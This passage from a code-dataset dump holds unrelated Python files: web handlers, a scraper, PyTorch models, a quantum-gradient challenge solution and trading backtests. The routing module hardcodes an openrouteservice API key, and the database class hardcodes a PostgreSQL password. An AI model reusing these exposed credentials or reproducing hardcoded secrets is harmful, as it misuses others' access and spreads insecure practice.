list(Student.query(Student.teacher==self.request.get('teacher')))\n\t\tself.response.out.write(json.dumps([s.to_dict() for s in students]))\n\n\t\t\n# assigns a web address to a handler\napplication = webapp2.WSGIApplication([\n\t('/', MainPage),\n\t('/import', ImportHandler),\n\t('/export', ExportHandler),\n\t('/track', LapTrackerHandler),\n\t('/teacher_names', TeacherNameHandler),\n\t('/student_names', StudentNameHandler),\n], debug=True)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"327103011","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 22 16:49:05 2017\n\n@author: eric\n\"\"\"\nfrom selenium import webdriver\n\n# Save a screenshot from www.nu.nl to current directory\n\nDRIVER = 'chromedriver'\ndriver = webdriver.Chrome(DRIVER)\n\ndriver.maximize_window()\ndriver.get('http://www.nu.nl')\nscreenshot = driver.save_screenshot('my_screenshot.png')\ndriver.quit()","sub_path":"webpage.py","file_name":"webpage.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"591255789","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n#\r\n# mall_jd.py\r\n# @Author : PengYingZhi\r\n# @Date : 2018-3-10 17:03:29\r\n\r\nimport cv2 as cv\r\n\r\nfrom goldeye.preprocessing.binaryzation import binary\r\nfrom goldeye.preprocessing.clear import clear_noise_by_neighbor\r\nfrom goldeye.preprocessing.cut import projection_extremum_split\r\n\r\n\r\ndef preprocess(image):\r\n \"\"\"\r\n 预处理流程\r\n\r\n Params:\r\n * image: (array) - numpy数组\r\n\r\n Returns:\r\n * childs: (list) - 切分后的用于预测的子图\r\n \"\"\"\r\n image = binary(image, thresh=180)\r\n image = clear_noise_by_neighbor(\r\n image=image, thresh=5)\r\n childs = [\r\n image[:, pair[0]:pair[1]]\r\n for pair in projection_extremum_split(image, window=8)\r\n ]\r\n childs = [\r\n cv.resize(child, (20, 15)) for child in childs\r\n ]\r\n return childs\r\n","sub_path":"goldeye/models/mall_jd.py","file_name":"mall_jd.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"640252986","text":"import os\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets, transforms, models\n\n\n# copy-pasta from https://pytorch.org/vision/stable/_modules/torchvision/models/inception.html#inception_v3\nclass BasicConv2d(nn.Module):\n\n def __init__(\n self,\n in_channels: int,\n out_channels: int,\n **kwargs\n ) -> None:\n super(BasicConv2d, self).__init__()\n self.conv = nn.Conv2d(in_channels, out_channels, bias=False, **kwargs)\n self.bn = nn.BatchNorm2d(out_channels, eps=0.001)\n\n def forward(self, x):\n x = self.conv(x)\n x = self.bn(x)\n return F.relu(x, inplace=True)\n\nclass InceptionModel(nn.Module):\n\n def __init__(self, num_classes):\n super(InceptionModel, self).__init__()\n self.inception = models.inception_v3(\n num_classes=num_classes,\n aux_logits=False,\n transform_input=False,\n pretrained=False,\n progress=False\n )\n # modify to deal with 1-channel inputs as we have grayscale images\n self.inception.Conv2d_1a_3x3 = BasicConv2d(1, 32, kernel_size=3, stride=1)\n\n def forward(self,img):\n x = self.inception(img)\n # return F.log_softmax(x, dim=1) # for nll_loss\n return x # for CrossEntropyLoss\n # expl. see here: https://stackoverflow.com/a/65193236/9920677\n\nclass GoogleNetModel(nn.Module):\n\n def __init__(self, num_classes):\n super(GoogleNetModel, self).__init__()\n self.googlenet = models.googlenet(\n num_classes=num_classes,\n aux_logits=False,\n transform_input=False,\n pretrained=False,\n progress=False\n )\n # modify to deal with 1-channel inputs as we have grayscale images\n self.googlenet.conv1 = BasicConv2d(1, 64, kernel_size=7, stride=2, padding=3)\n\n def forward(self,img):\n return self.googlenet(img)\n\nif __name__ == \"__main__\":\n\n from torchsummary import summary\n import json\n\n NUM_CLASSES = len(json.load(open(\"glyph_dict.json\")))\n\n # initialize model\n model = GoogleNetModel(num_classes=NUM_CLASSES)\n summary(model, (1, 224,224)) # but we have (1, 101, 101)!\n","sub_path":"ocr/classifier/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"244340828","text":"import torch\nimport torch.nn as nn\nimport numpy as np\nimport random\nfrom torch.utils.data import DataLoader\nfrom dataloader import IEMOCAPDataset\nfrom model import DialogueRNN, MaskedNLLLoss\nfrom sklearn.metrics import accuracy_score\n\n# mask\n\ndef get_IEMOCAP_loaders(path, batch_size=32, num_workers=0):\n trainset = IEMOCAPDataset(path=path)\n testset = IEMOCAPDataset(path=path, train=False)\n train_loader = DataLoader(trainset, batch_size=batch_size, collate_fn=trainset.collate_fn, num_workers=num_workers)\n test_loader = DataLoader(testset, batch_size=batch_size, collate_fn=testset.collate_fn, num_workers=num_workers)\n return train_loader, test_loader\n\nif __name__ == '__main__':\n random.seed(53113)\n np.random.seed(53113)\n torch.manual_seed(53113)\n\n BATCH_SIZE = 32\n path = './IEMOCAP_features/IEMOCAP_features_raw.pkl'\n epochs = 10\n train_loader, test_loader = get_IEMOCAP_loaders(path, batch_size=BATCH_SIZE)\n D_m = 100\n D_g = 150 # global GRU的输出向量维度\n D_p = 150\n D_e = 100\n D_l = 100\n D_c = 6\n learning_rate = 0.01\n model = DialogueRNN(D_m, D_g, D_p, D_e, D_l, D_c)\n # loss_fn = MaskedNLLLoss() # 还要改pred的维数, 研究target为什么不用乘mask_\n loss_fn = nn.CrossEntropyLoss()\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate, weight_decay=0.00001)\n\n for e in range(20):\n # training\n model.train()\n # 拿到数据后,把数据三个特征拼接起来传入model,,可是源码里只传入了text的特征,不知道为什么\n for i, (videoText, videoVisual, videoAudio,\n videoSpeakers, s, videoLabels, vid) in enumerate(train_loader):\n optimizer.zero_grad()\n loss, pred_y = model(videoText, videoLabels)\n # print(\"videoText\", videoText.shape[0] * videoText.shape[1])\n # 该批次的句子总数\n u_count = videoText.shape[0] * videoText.shape[1]\n loss /= (u_count)\n # labels original shape: batch_size, seq_len ,根据训练的顺序(先batch后seq), 故把shape转置,然后按行合并成一维矩阵\n labels = videoLabels.transpose(0, 1).reshape(u_count)\n # print(\"pred_y shape\", pred_y.shape)\n # print(\"labels count\", videoLabels.shape[0] * videoLabels.shape[1])\n # print(\"labels.shape \", labels.shape)\n loss.backward()\n optimizer.step()\n train_acc = accuracy_score(labels.long(), pred_y)\n if e == 9:\n print(pred_y[:30])\n print(labels[:30])\n print(\"epoch :\", e, \" train loss :\", loss, \"train acc :\", train_acc)\n # 问题,在第一个g_hist拼接完成之后,simple attention中的scaler计算出错,还是在维度上没搞清,考虑在GRUCell中加入参数batch_first=True, 把batch_size放在第一维\n # 疑问:DialogueRNN模型是以对话为一个单位的,即时间序列控制在一个对话中,那数据集中的句子为什么不是按对话来切割,而是固定批次大小为32\n # 是不是 32批次表示的是32个对话? 假如其中一个对话的长度为87,且是32个对话中最长的,则其他比它短的句子要padding\n # dataloader切割的 87 * 32 * 150 videoText, 意思应该是 32个对话,每个对话87个句子,其中存在padding对话(即真实长度不满87个句子)\n\n # testing\n model.eval()\n for i, (videoText, videoVisual, videoAudio,\n videoSpeakers, s, videoLabels, vid) in enumerate(test_loader):\n loss, pred_y = model(videoText, videoLabels)\n # 该批次的句子总数\n u_count = videoText.shape[0] * videoText.shape[1]\n loss /= (u_count)\n # labels original shape: batch_size, seq_len ,根据训练的顺序(先batch后seq), 故把shape转置,然后按行合并成一维矩阵\n labels = videoLabels.transpose(0, 1).reshape(u_count)\n test_acc = accuracy_score(labels.long(), pred_y)\n print(\"epoch :\", e, \" test loss :\", loss, \"test acc :\", test_acc)","sub_path":"train_test_noMask.py","file_name":"train_test_noMask.py","file_ext":"py","file_size_in_byte":4175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"110720624","text":"\ndef calc(source,destination):\n from openrouteservice import convert\n import openrouteservice as ors\n import folium \n import osmnx as ox\n from simplification.cutil import simplify_coords\n\n client = ors.Client(key='5b3ce3597851110001cf6248f7fc2435c8db4769a07ea6d7284e0477')\n\n origin=list(source)\n dest=list(destination)\n\n origin.reverse()\n dest.reverse()\n\n coordinates = [origin,dest]\n\n route_fast = client.directions(\n coordinates=coordinates,\n profile=\"driving-car\",\n format='geojson',\n preference=\"fastest\",\n units='km',\n validate=False,\n )\n route_fast_polyline = client.directions(\n coordinates=coordinates,\n profile=\"driving-car\",\n format='json',\n preference=\"fastest\",\n validate=False,\n)\n distance = route_fast['features'][0]['properties']['segments'][0]['distance']\n geometry=route_fast_polyline['routes'][0]['geometry']\n \n decoded = convert.decode_polyline(geometry,False)\n #print(\"original length\",len(decoded['coordinates']))\n simplified = simplify_coords(decoded['coordinates'], 0.07)\n #print(\"simplified=\",str(len(simplified)))\n\n decoded['coordinates']=[list(reversed(coord)) \n for coord in simplified]\n\n return distance,decoded\n","sub_path":"city/dist_calc.py","file_name":"dist_calc.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"413412511","text":"\n\nfrom xai.brain.wordbase.nouns._enmity import _ENMITY\n\n#calss header\nclass _ENMITIES(_ENMITY, ):\n\tdef __init__(self,): \n\t\t_ENMITY.__init__(self)\n\t\tself.name = \"ENMITIES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"enmity\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_enmities.py","file_name":"_enmities.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"560291660","text":"import requests\nfrom bs4 import BeautifulSoup\n\nmy_url = \"https://movie.naver.com/movie/running/current.nhn\"\nresponse = requests.get(my_url)\nsoup = BeautifulSoup(response.text, 'html.parser')\n\nmovies_section = soup.select('#content > div.article > div:nth-child(1) > div.lst_wrap > ul > li')\nmovie_list =[]\nfor movie in movies_section:\n title = movie.select_one('dl > dt > a')\n movie_info ={\n 'title' : title.text,'code' : title['href'].split('=')[1]\n }\n movie_list.append(movie_info)\n # movie_list[title.text] = title['href'].split('=')[1]\n\n# iframe 때문에안됨 \n# for movie in movie_list:\n# movie_code = movie['code']\n# review_url = f'https://movie.naver.com/movie/bi/mi/point.nhn?code={movie_code}'\n# review_response = requests.get(review_url)\n# review_soup2 = BeautifulSoup(review_response.text, 'html.parser')\n# review_section = soup.select('body > div > div > div.score_result > ul > li')\n\n\nreview_section_list=[]\nfor movie in movie_list:\n movie_code = movie['code']\n params = (\n ('code', movie_code),\n ('type', 'after'),\n ('isActualPointWriteExecute', 'false'),\n ('isMileageSubscriptionAlready', 'false'),\n ('isMileageSubscriptionReject', 'false'),\n )\n # headers = {\n # 'authority': 'movie.naver.com',\n # 'upgrade-insecure-requests': '1',\n # 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36',\n # 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n # 'sec-fetch-site': 'same-origin',\n # 'sec-fetch-mode': 'navigate',\n # 'sec-fetch-dest': 'iframe',\n # 'referer': f'https://movie.naver.com/movie/bi/mi/point.nhn?code={movie_code}',\n # 'accept-language': 'ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6,zh;q=0.5,ja;q=0.4',\n # }\n \n review_response = requests.get('https://movie.naver.com/movie/bi/mi/pointWriteFormList.nhn', params=params)\n review_soup2 = BeautifulSoup(review_response.text, 'html.parser')\n review_list = review_soup2.select('body > div > div > div.score_result > ul > li')\n j = 0\n for review in review_list:\n score = ''\n reple = ''\n score =review.select_one('div.star_score > em').text\n if review.select_one(f'div.score_reple > p > span[id=_filtered_ment_{j}] > span[id=_unfiold_ment{j}]'):\n reple =review.select_one(f'div.score_reple > p > span[id=_filtered_ment_{j}] > span > a')['data-src']\n else:\n reple =review.select_one(f'div.score_reple > p > span[id=_filtered_ment_{j}]').text.strip()\n print(score,reple)\n j += 1\n\n # review_section_list.append(review_section)\n\n# for review in review_section_list:\n# j=0\n\n# for i in review:\n# title = i.select_one(f'div.score_reple > p > span[id=_filtered_ment_{j}]')\n# if title:\n# print(title.text)\n# j += 1\n \n \n","sub_path":"movie.py","file_name":"movie.py","file_ext":"py","file_size_in_byte":3017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"291617615","text":"import psycopg2\nfrom psycopg2 import OperationalError\nfrom decimal import Decimal\n\n\nclass Database:\n\n def __init__(self,db_name=\"libbot\", db_user=\"shakakanenobu\", db_password=\"iFaceYellow\", db_host=\"localhost\", db_port=5432):\n self.db_name = db_name\n self.db_user = db_user\n self.db_password = db_password\n self.db_host = db_host\n self.db_port = db_port\n self.connection = None\n\n\n #Every method will automatically call to this for user\n def create_connection(self):\n # print(\"Parameters are: \",db_name,db_user,db_password,db_host,db_port)\n try:\n self.connection = psycopg2.connect(\n database = self.db_name,\n user = self.db_user,\n password = self.db_password,\n host = self.db_host,\n port = self.db_port,\n )\n # cursor = self.connection.cursor()\n print(\"Connection to PostgreSQL DB successful\")\n except OperationalError as e:\n print(f\"The error '{e}' occurred\")\n # return connection\n \n def close_connection(self):\n self.connection.close()\n\n\n def new_user(self, username):\n sql_students = \"\"\"INSERT INTO students(username) VALUES(%s) RETURNING id;\"\"\"\n sql_error_stats = \"INSERT INTO error_stats(student_id) VALUES(%s) RETURNING id;\"\n # connection = None\n id = None\n try:\n # connection = create_connection()\n cursor = self.connection.cursor()\n cursor.execute(sql_students,(username,))\n id_student = cursor.fetchone()[0]\n cursor.execute(sql_error_stats,(id_student,))\n id_stats = cursor.fetchone()[0]\n self.connection.commit()\n cursor.close()\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n return id_student, id_stats\n \n def get_student_id(self, username):\n sql = \"\"\"SELECT id FROM students WHERE username = %s;\"\"\"\n id = None\n try:\n cursor = self.connection.cursor()\n cursor.execute(sql,(username,))\n id = cursor.fetchone()\n print(\"User\", username, \"has id of\", id[0])\n cursor.close()\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if id is not None:\n return id[0]\n\n\n\n def get_reliability(self,id):\n sql = \"\"\"SELECT reliability FROM error_stats WHERE student_id = %s;\"\"\"\n reliability = None\n try:\n # connection = create_connection()\n cursor = self.connection.cursor()\n cursor.execute(sql,(id,))\n reliability = cursor.fetchone()\n print(\"RELIABILITY IS: \", float(reliability[0]))\n cursor.close()\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if reliability is not None:\n return reliability[0]\n # finally:\n # if connection is not None:\n # connection.close()\n\n #Finds an exponential moving average of the reliability of users\n def new_reliability(self, ema_minus_one, success, a = 1/6):\n ema = 1 if success else 0\n if ema_minus_one is not None:\n print(\"EMA IS:\",ema)\n ema = a * ema + (1 - a) * ema_minus_one\n return ema\n\n\n def update_stats(self,id,success):\n \n sql_success = \"\"\"UPDATE error_stats \n SET num_tried = num_tried + 1, num_success = num_success + 1, \n last_ran = DATE_TRUNC('second', NOW()::TIMESTAMP), reliability = %s \n WHERE student_id = %s\"\"\"\n sql_fail = \"\"\"UPDATE error_stats \n SET num_tried = num_tried + 1, \n last_ran = DATE_TRUNC('seconds',NOW()::TIMESTAMP), \n last_failed = DATE_TRUNC('seconds',NOW()::TIMESTAMP), reliability = %s \n WHERE student_id = %s\"\"\"\n # connection = None\n updated_rows = 0\n r = self.get_reliability(id)\n if r is not None:\n r = float(r)\n r = self.new_reliability(r, success)\n try:\n # connection = create_connection()\n cursor = self.connection.cursor()\n if success:\n cursor.execute(sql_success,(r,id))\n else:\n cursor.execute(sql_fail,(r,id))\n updated_rows = cursor.rowcount\n self.connection.commit()\n cursor.close()\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n # finally:\n # if connection is not None:\n # connection.close()\n return updated_rows\n\n\n\n\n\n\n def connect(self):\n try:\n # print(\"Trying to connect\")\n connection = create_connection()\n # print(\"trying to create cursor\")\n cursor = connection.cursor()\n print('PostgreSQL database version:')\n cursor.execute('SELECT version()')\n db_version = cursor.fetchone()\n print(db_version)\n cursor.close()\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if connection is not None:\n connection.close()\n print('Database connection closed')\n\n\n\n def execute_query(connection, query):\n connection.autocommit = True\n cursor = connection.cursor()\n try:\n cursor.execute(query)\n print(\"Query executed successfully\")\n except OperationalError as e:\n print(f\"The error {e} occured\")\n \n# if __name__ == '__main__':\n# connect()","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":5821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"156835390","text":"# encoding=utf-8\nimport pdb\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom loss import DiscCentroidsLoss\nfrom .MetaEmbeddingClassifier import MetaEmbedding_Classifier\nimport torch.nn.functional as F\n\nfrom .resnest import resnest101, resnest200\n\nclasses = 50030\n\narch_dict = {\n 'MetaEmbedding': resnest101,\n}\n\n\nclass NoModule(nn.Module):\n def __init__(self):\n super(NoModule, self).__init__()\n\n def forward(self, x):\n return x\n\n\nclass DirectFeature(nn.Module):\n def __init__(self, arch):\n super(DirectFeature, self).__init__()\n self.network = arch_dict[arch](pretrained=True)\n # pdb.set_trace()\n self.num_ftrs = self.network.fc.in_features\n self.network.fc = NoModule() # Direct Feature没有fc了\n\n def forward(self, input):\n x = input\n y = self.network(x)\n return y\n\n def get_feature_num(self):\n return self.num_ftrs\n\n\nclass Classifier(nn.Module):\n def __init__(self, num_features):\n super(Classifier, self).__init__()\n self.fc = nn.Linear(num_features, classes)\n\n def forward(self, input):\n return self.fc(input)\n\n\nclass MetaEmbedding(nn.Module):\n\n def __init__(self, feat_dim=2048, num_classes=1000):\n super(MetaEmbedding, self).__init__()\n self.num_classes = num_classes\n self.fc_hallucinator = nn.Linear(feat_dim, num_classes)\n self.fc_selector = nn.Linear(feat_dim, feat_dim)\n self.classifier = Classifier(feat_dim)\n\n def forward(self, x, centroids, *args):\n # storing direct feature\n direct_feature = x.clone()\n\n batch_size = x.size(0)\n feat_size = x.size(1)\n\n # set up visual memory\n x_expand = x.clone().unsqueeze(1).expand(-1, self.num_classes, -1)\n centroids_expand = centroids.clone().unsqueeze(0).expand(batch_size, -1, -1)\n keys_memory = centroids.clone()\n\n # computing reachability\n dist_cur = torch.norm(x_expand - centroids_expand, 2, 2)\n values_nn, labels_nn = torch.sort(dist_cur, 1)\n scale = 10.0\n reachability = (scale / values_nn[:, 0]).unsqueeze(1).expand(-1, feat_size)\n\n # computing memory feature by querying and associating visual memory\n values_memory = self.fc_hallucinator(x.clone())\n values_memory = values_memory.softmax(dim=1)\n memory_feature = torch.matmul(values_memory, keys_memory)\n\n # computing concept selector\n concept_selector = self.fc_selector(x.clone())\n concept_selector = concept_selector.tanh()\n x = reachability * (direct_feature + concept_selector * memory_feature)\n\n # storing infused feature\n infused_feature = concept_selector * memory_feature\n\n logits = self.classifier(x)\n\n return logits, [direct_feature, infused_feature]\n\n\n\n# class Classifier(nn.Module):\n# def __init__(self, arch):\n# super(Classifier, self).__init__()\n# self.network = arch_dict[arch](pretrained=True)\n# # pdb.set_trace()\n# self.disc_loss = DiscCentroidsLoss(num_classes=classes, feat_dim=self.network.fc.in_features)\n#\n# num_ftrs = self.network.fc.in_features\n# # self.networks['classifier'](self.features, self.centroids)\n# self.clf = MetaEmbedding_Classifier(feat_dim=num_ftrs, num_classes=classes)\n# self.centroids = self.disc_loss.centroids.data if self.training else None\n#\n# self.network._modules.pop('fc')\n# \"\"\"\n# self.clf.fc_hallucinator = init_weights(model=self.clf.fc_hallucinator,\n# weights_path='./logs/%s/stage1/final_model_checkpoint.pth' % dataset,\n# classifier=True)\n# \"\"\"\n#\n# # self.network.fc = self.clf.fc_hallucinator\n#\n# def forward(self, input, centroids):\n# x = self.network(input)\n#\n# y = self.clf(x, centroids)\n#\n# return y # logits, [direct_feature, infused_feature]\n\n\n\n\n# a = Classifier()\n# img = torch.randn([1, 3, 256, 256])\n# a(img)\n","sub_path":"network/MetaEmbedding/meta_embedding.py","file_name":"meta_embedding.py","file_ext":"py","file_size_in_byte":4064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"449264101","text":"#! /usr/bin/python3\n\nimport sys\nimport pennylane as qml\nimport numpy as np\n\n\ndef gradient_200(weights, dev):\n r\"\"\"This function must compute the gradient *and* the Hessian of the variational\n circuit using the parameter-shift rule, using exactly 51 device executions.\n The code you write for this challenge should be completely contained within\n this function between the # QHACK # comment markers.\n\n Args:\n weights (array): An array of floating-point numbers with size (5,).\n dev (Device): a PennyLane device for quantum circuit execution.\n\n Returns:\n tuple[array, array]: This function returns a tuple (gradient, hessian).\n\n * gradient is a real NumPy array of size (5,).\n\n * hessian is a real NumPy array of size (5, 5).\n \"\"\"\n\n @qml.qnode(dev, interface=None)\n def circuit(w):\n for i in range(3):\n qml.RX(w[i], wires=i)\n\n qml.CNOT(wires=[0, 1])\n qml.CNOT(wires=[1, 2])\n qml.CNOT(wires=[2, 0])\n\n qml.RY(w[3], wires=1)\n\n qml.CNOT(wires=[0, 1])\n qml.CNOT(wires=[1, 2])\n qml.CNOT(wires=[2, 0])\n\n qml.RX(w[4], wires=2)\n\n return qml.expval(qml.PauliZ(0) @ qml.PauliZ(2))\n\n gradient = np.zeros([5], dtype=np.float64)\n hessian = np.zeros([5, 5], dtype=np.float64)\n\n # QHACK #\n shift_value = np.pi/4\n\n def parameter_shift_term(circuit, weights, i):\n shifted = weights.copy()\n shifted[i] += shift_value * 2\n forward = circuit(shifted) # forward evaluation\n\n shifted[i] -= 2 * shift_value * 2\n backward = circuit(shifted) # backward evaluation\n\n return 0.5 * (forward - backward) / np.sin(shift_value*2), forward, backward\n \n forwards = np.zeros(5)\n backwards = np.zeros(5)\n for i in range(5):\n gradient[i], forwards[i], backwards[i] = parameter_shift_term(circuit, weights, i)\n \n def shift_vector(i):\n vector = np.zeros(5)\n vector[i] = 1\n return vector\n \n circuit_unshifted = circuit(weights)\n \n def evaluate_circuit(shifts):\n if np.any(shifts != 0) and np.all(shifts != 2*np.pi):\n return circuit(weights + shifts)\n return circuit_unshifted\n \n for i in range(5):\n for j in range(i+1):\n i_shift = shift_value * shift_vector(i)\n j_shift = shift_value * shift_vector(j)\n\n if i == j:\n hessian[i, i] = 0.25 * (\n forwards[i] + backwards[i] - 2 * circuit_unshifted\n ) / np.sin(shift_value)**2\n\n else:\n hessian[i, j] = 0.25 * (\n evaluate_circuit(i_shift + j_shift)\n - evaluate_circuit(i_shift - j_shift)\n - evaluate_circuit(-i_shift + j_shift)\n + evaluate_circuit(-i_shift - j_shift)\n ) / np.sin(shift_value)**2\n \n hessian[j, i] = hessian[i, j]\n # QHACK #\n\n return gradient, hessian, circuit.diff_options[\"method\"]\n\n\nif __name__ == \"__main__\":\n # DO NOT MODIFY anything in this code block\n weights = sys.stdin.read()\n weights = weights.split(\",\")\n weights = np.array(weights, float)\n\n dev = qml.device(\"default.qubit\", wires=3)\n gradient, hessian, diff_method = gradient_200(weights, dev)\n\n print(\n *np.round(gradient, 10),\n *np.round(hessian.flatten(), 10),\n dev.num_executions,\n diff_method,\n sep=\",\"\n )\n","sub_path":"QML_Challenges/quantum_gradients_200_template/quantum_gradients_200_template.py","file_name":"quantum_gradients_200_template.py","file_ext":"py","file_size_in_byte":3484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"191446536","text":"import numpy as np\n\ni=0\ndata=open('TFMC_pilot_9tapes_mesh_shorter_HTS_leads1.mesh', 'rt')\nnew_mesh=[]\nelement_num=0\nbdr_num=0\nfor x in data:\n new_mesh.append(x)\n if x=='elements\\n':\n element_num = i+2\n if x=='boundary\\n':\n bdr_num = i+2 \n i=i+1\n if i==4000000:\n break\n\nprint('element_number=',element_num)\nprint('boundary_number=',bdr_num)\n#for element in mymeh:\n# print(element) \n\n\n\n#print(new_mesh[bdr_num-3])\n#bdr_num-2\n#element_num\nflag = 0\nk=0\nfor j in range(element_num, element_num+20):\n i=0\n #print(new_mesh[j])\n for ch in new_mesh[j]: \n if ch==' ':\n if new_mesh[j][0:i]=='8' and flag==0:\n flag=1\n #print('I am in flag')\n temp=new_mesh[j]\n k=j\n #print('I am in flag',k)\n break\n\n if flag==1: \n #print('I am in flag=1') \n if new_mesh[j][0:i]=='4' or new_mesh[j][0:i]=='5':\n #print('I found 4/5',k)\n new_mesh[k]=new_mesh[j]\n new_mesh[j]=temp\n k=j\n #temp = new_mesh[k]\n break\n break\n i=i+1 \n\nfor j in range(element_num, element_num+20):\n print(new_mesh[j])\n#print('adfsdf=',len(new_mesh))\n# print(new_mesh[i])\n","sub_path":"normal_vec.py","file_name":"normal_vec.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"292787061","text":"from __future__ import(absolute_import,division,print_function,unicode_literals)\nimport backtrader as bt \nfrom strategy import MovingAverage\nfrom strategy import chart_detection\nfrom positionsize import examplesizer\nfrom positionsize import maxRiskSizer\nimport datetime as dt\nfrom commision import CommNifty\n# from analyzers import printTradeAnalysis,printSQN\nimport json\n# \n\n\ndatapath=\"E:/Backtesting pandas/Data/Nifty-1D.csv\"\n# datapath=\"F:/Zerodha data/BankNifty futures continuous\\Bankniftyfutures1.csv\"\n\nif __name__==\"__main__\":\n\tcerebro=bt.Cerebro()\n\tcommission = CommNifty(commission=0.03,mult=75,margin=100000)\n\tcerebro.addstrategy(chart_detection)\n\tdata=bt.feeds.GenericCSVData(\n\tdataname=datapath,\n\tfromdate=dt.datetime(2008,1,1),\n\ttodate=dt.datetime(2018,1,1),\n\tdatetime=0,\n\ttimeframe=bt.TimeFrame.Days,\n\tcompression=1,\n\tdtformat=(\"%Y-%m-%d\"),\n\topen=1,\n\thigh=2,\n\tlow=3,\n\tclose=4,\n\topeninterest=-1, \n\tvolume=-1,\n\treverse=False,\n\theader=0\n\t\t)\n\t\n\t\ncerebro.adddata(data)\ncerebro.addsizer(bt.sizers.FixedSize,stake=1)\n# cerebro.addsizer(maxRiskSizer,risk=0.05)\ncerebro.broker.setcash(500000.00)\n# cerebro.broker.setcommission(commission=20.0, margin=100000.0, mult=50.0)\ncerebro.broker.addcommissioninfo(commission)\n\n\n\ncerebro.addanalyzer(bt.analyzers.TradeAnalyzer, _name=\"ta\")\ncerebro.addanalyzer(bt.analyzers.SQN, _name=\"sqn\")\ncerebro.addanalyzer(bt.analyzers.Calmar,_name=\"Calmar\")\ncerebro.addanalyzer(bt.analyzers.SharpeRatio,_name=\"Sharpe\")\ncerebro.addanalyzer(bt.analyzers.DrawDown,_name=\"drawdown\")\ncerebro.addanalyzer(bt.analyzers.AnnualReturn,_name=\"annualreturn\")\ncerebro.addanalyzer(bt.analyzers.Returns,_name=\"return\")\ncerebro.addanalyzer(bt.analyzers.VWR,_name=\"vwr\")\ncerebro.addanalyzer(bt.analyzers.TimeDrawDown,_name=\"timedrawdown\")\ncerebro.addanalyzer(bt.analyzers.PyFolio,_name=\"portfolio\")\n\ncerebro.addobserver(bt.observers.Trades)\ncerebro.addobserver(bt.observers.DrawDown)\ncerebro.addobserver(bt.observers.BuySell)\n# cerebro.addwriter(bt.WriterFile,csv=True,out=\"Output/data.csv\")\n\n\n\n\n\nprint(\"Starting portfolio value :\",cerebro.broker.getvalue())\nstrategies = cerebro.run()\n# cerebro.plot()\n\n# positions, transactions, gross_lev = strategies[0].analyzers.pyfolio.get_pf_items()\n# pf.create_round_trip_tear_sheet(returns, positions, transactions)\n# firstStrat = strategies[0]\n# printTradeAnalysis(firstStrat.analyzers.ta.get_analysis())\n# printSQN(firstStrat.analyzers.sqn.get_analysis())\nprint(\"Final portfolio value :\",cerebro.broker.getvalue())\n# cerebro.plot(style='candlestick')\n\n# annualreturnanalyzer = open(r\"Output/annualreturnanalayzer.txt\",\"w+\")\n# drawdownanalyzer = open(r\"Output/drawndownanalayzer.txt\",\"w+\")\n# sharperatioanalyzer = open(r\"Output/sharperatioanalayzer.txt\",\"w+\")\n# vwranalyzer = open(r\"Output/vwranalayzer.txt\",\"w+\")\n# returnanalyzer = open(r\"Output/returnanalayzer.txt\",\"w+\")\n# tradeanalyzer = open(r\"Output/tradeanalayzer.txt\",\"w+\")\n# time_drawdown_analyzer=open(r\"Output/timedrawdownanalayzer.txt\",\"w+\")\n# sqn_analyzer=open(r\"Output/sqnanalayzer.txt\",\"w+\")\n\n# annualreturnanalyzer.write(json.dumps(firstStrat.analyzers.getbyname(\"annualreturn\").get_analysis()))\n# drawdownanalyzer.write(json.dumps(firstStrat.analyzers.getbyname(\"drawdown\").get_analysis()))\n# sharperatioanalyzer.write(json.dumps(firstStrat.analyzers.getbyname(\"Sharpe\").get_analysis()))\n# vwranalyzer.write(json.dumps(firstStrat.analyzers.getbyname(\"vwr\").get_analysis()))\n# returnanalyzer.write(json.dumps(firstStrat.analyzers.getbyname(\"return\").get_analysis()))\n# 